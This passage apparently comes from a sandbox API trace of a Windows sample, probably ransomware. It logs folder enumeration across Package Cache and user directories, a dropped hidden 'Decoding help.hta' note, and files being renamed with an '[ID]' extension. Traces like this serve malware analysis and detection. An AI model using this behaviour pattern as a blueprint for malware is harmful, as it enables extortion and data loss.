Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*") returned 91 [0043.049] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0043.049] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*" [0043.049] GlobalMemoryStatus (in: lpBuffer=0x16f1fd10 | out: lpBuffer=0x16f1fd10) [0043.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e66fd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.056] CloseHandle (hObject=0x708) returned 1 [0043.056] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x16f1fd30 | out: lpFindFileData=0x16f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.057] FindClose (in: hFindFile=0x671a70 | out: hFindFile=0x671a70) returned 1 Thread: id = 350 os_tid = 0xa60 [0043.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*", lpFindFileData=0x1705fd30 | out: lpFindFileData=0x1705fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ab0 [0043.054] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.054] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1705fd30 | out: lpFindFileData=0x1705fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.054] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.054] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1705fd30 | out: lpFindFileData=0x1705fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.054] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.054] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.054] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.054] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*" [0043.055] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*") returned 90 [0043.055] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0043.055] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*" [0043.055] GlobalMemoryStatus (in: lpBuffer=0x1705fd10 | out: lpBuffer=0x1705fd10) [0043.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e05c20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.076] CloseHandle (hObject=0x6a0) returned 1 [0043.076] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1705fd30 | out: lpFindFileData=0x1705fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.076] FindClose (in: hFindFile=0x671ab0 | out: hFindFile=0x671ab0) returned 1 Thread: id = 351 os_tid = 0xa68 [0043.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*", lpFindFileData=0x1719fd30 | out: lpFindFileData=0x1719fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0043.073] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.073] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x1719fd30 | out: lpFindFileData=0x1719fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.074] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.074] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.074] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x1719fd30 | out: lpFindFileData=0x1719fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.074] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.074] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.074] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*" [0043.074] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*") returned 90 [0043.074] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0043.074] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*" [0043.074] GlobalMemoryStatus (in: lpBuffer=0x1719fd10 | out: lpBuffer=0x1719fd10) [0043.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9872780, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.084] CloseHandle (hObject=0x708) returned 1 [0043.084] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x1719fd30 | out: lpFindFileData=0x1719fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.084] FindClose (in: hFindFile=0x671a70 | out: hFindFile=0x671a70) returned 1 Thread: id = 352 os_tid = 0xa6c [0043.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*", lpFindFileData=0x172dfd30 | out: lpFindFileData=0x172dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ab0 [0043.079] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.079] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x172dfd30 | out: lpFindFileData=0x172dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.079] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.079] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.079] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x172dfd30 | out: lpFindFileData=0x172dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.079] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.079] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.079] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.079] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*" [0043.079] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*") returned 90 [0043.079] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0043.079] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*" [0043.079] GlobalMemoryStatus (in: lpBuffer=0x172dfd10 | out: lpBuffer=0x172dfd10) [0043.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x988a7e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.082] CloseHandle (hObject=0x6a0) returned 1 [0043.082] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x172dfd30 | out: lpFindFileData=0x172dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.082] FindClose (in: hFindFile=0x671ab0 | out: hFindFile=0x671ab0) returned 1 Thread: id = 353 os_tid = 0xa70 [0043.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*", lpFindFileData=0x1741fd30 | out: lpFindFileData=0x1741fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da438 [0043.854] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.854] FindNextFileW (in: hFindFile=0x5da438, lpFindFileData=0x1741fd30 | out: lpFindFileData=0x1741fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.854] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.854] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.854] FindNextFileW (in: hFindFile=0x5da438, lpFindFileData=0x1741fd30 | out: lpFindFileData=0x1741fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.854] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.854] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.854] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.854] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*" [0043.854] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*") returned 90 [0043.854] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0043.854] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*" [0043.854] GlobalMemoryStatus (in: lpBuffer=0x1741fd10 | out: lpBuffer=0x1741fd10) [0043.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1115bbb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x774 [0044.132] CloseHandle (hObject=0x774) returned 1 [0044.132] FindNextFileW (in: hFindFile=0x5da438, lpFindFileData=0x1741fd30 | out: lpFindFileData=0x1741fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0044.132] FindClose (in: hFindFile=0x5da438 | out: hFindFile=0x5da438) returned 1 Thread: id = 354 os_tid = 0xa04 [0043.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x1755fd30 | out: lpFindFileData=0x1755fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 355 os_tid = 0xa74 [0043.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x1769fd30 | out: lpFindFileData=0x1769fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0043.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.094] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x1769fd30 | out: lpFindFileData=0x1769fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.094] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.094] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x1769fd30 | out: lpFindFileData=0x1769fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0043.094] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0043.094] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned 49 [0043.094] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\Decoding help.hta" [0043.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\decoding help.hta")) returned 0xffffffff [0043.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.094] WriteFile (in: hFile=0x708, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1769fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1769fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.095] CloseHandle (hObject=0x708) returned 1 [0043.095] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.095] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0043.096] lstrlenW (lpString="desktop.ini") returned 11 [0043.096] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0043.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned 49 [0043.096] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" [0043.096] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" [0043.096] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0043.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved 